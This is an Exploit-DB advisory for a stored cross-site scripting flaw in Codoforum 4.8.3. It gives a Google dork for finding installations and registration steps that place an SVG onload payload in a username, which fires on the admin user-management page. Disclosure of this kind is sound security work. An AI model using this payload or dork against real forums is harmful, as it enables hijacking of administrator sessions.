Codoforum 4.8.3 – Persistent Cross-Site Scripting

  • 作者: Prasanth
    日期: 2020-01-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47876/
  • # Exploit Title: Codoforum 4.8.3 - Persistent Cross-Site Scripting
    # Google Dork: intext:"Powered by Codoforum"
    # Date: 2020-01-03
    # Exploit Author: Prasanth c41m, Vyshnav Vizz
    # Vendor Homepage: https://codoforum.com/index.php
    # Software Link: https://codoforum.com/buy
    # Version: Codoforum 4.8.3 
    # Tested on: [relevant os]
    # CVE : [if applicable]
    # source: https://medium.com/@c41m/b2e1133c6a91?
    
    Codoforum is prone to a stored xss vulnerability.
    An attacker can exploit this issue to creating user with payload and perform cross-site scripting attacks.
    Codoforum version 4.8.3 is vulnerable. 
    
    1. Install Codoforum 4.8.3 in a local server.
    2. Goto http://localhost/index.php?u=/user/register
    3. Create a user using :- 
    			username : "><svg/onload=alert(1)>
    			password : password
    			email: c41m@email.com
    4. Now goto http://localhost/admin/index.php?page=users/manage, an XSS alert popup will be triggered here.